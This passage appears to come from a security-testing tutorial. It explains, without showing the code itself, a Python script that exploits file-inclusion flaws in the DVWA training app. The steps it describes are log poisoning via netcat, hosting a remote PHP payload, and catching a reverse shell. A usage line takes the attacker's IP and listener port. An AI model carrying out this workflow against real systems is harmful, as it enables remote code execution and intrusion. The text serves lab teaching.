Let's take a look at the following code that will exploit LFI/RFI vulnerabilities in DVWA:

In the following code snippet, lines 65-74 check whether the application to be tested requires authentication for the vulnerability to be exploited:

If authentication is required, then the cookie values supplied from the user are set at a Selenium Python browser/driver, and the URL is invoked with cookie data to have a valid session:

The lines between 90 and 105 are used to control the LFI vulnerability workflow. This section has a sequence of steps that we perform manually. In line 91, we prepare the malicious URL that will poison the log file and place a PHP code snippet in the access.log file. In line 93, we place that malicious URL in a text file called exp.txt and we ask Netcat to take an input from that file. Remember that we used netcat when we poisoned the access.log file previously; the same operation will be repeated here. In line 97, we ask netcat to connect to the victim server on port 80, take an input from the exp.txt file, and send that input to the victim server, so that the log will be poisoned. We do this by creating a bash script, exp.sh. In line 99, we invoke this bash script, which will in turn invoke netcat and cause netcat to take an input from the evil.txt file, thereby poisoning the log. In line 103, we set up the exploit URL, the one that we will make our simulated selenium browser visit, for it to give us a reverse shell:

In line 115, we are invoking a process that will cause the browser to make a request to a vulnerable page with the payload using the start() method of that process, under line 116. But before actually accessing the exploit, we need to set up a netcat listener. Line 119 sets up a Netcat listener and we introduce a time delay of five seconds, as can be seen in the definition of the process method send_exp(), giving time for netcat to start. Once started, the payload is delivered with the send_exp() method, under line 61. If everything goes well, our listener gets the shell.

The lines 107-113, handle the RFI part of the vulnerability. To exploit the RFI, we need to have an evil file created at our attacker machine, evil.txt, which will deliver the PHP payload. Once created, we need to place it in /var/www/html/evil.txt. Then, we need to start the Apache server and update the payload delivery URL to the address of the RFI. Finally, with the send_exp() method, we deliver our payload and then start the netcat listener.

The preceding code works for both LFI and RFI vulnerabilities. The code given takes the user parameters in the following order:

python LFI_RFI.py <target ip> <target Base/Login URL> <target Vulnetable URL> <Target Vul parameter> <Login required (1/0)> <Login cookies> <Attacker IP> <Attacker Lister PORT> <Add params required (1/0)> <add_param_name1=add_param_value1,add_param_name2=add_param_value2>  | <LFI (0/1)>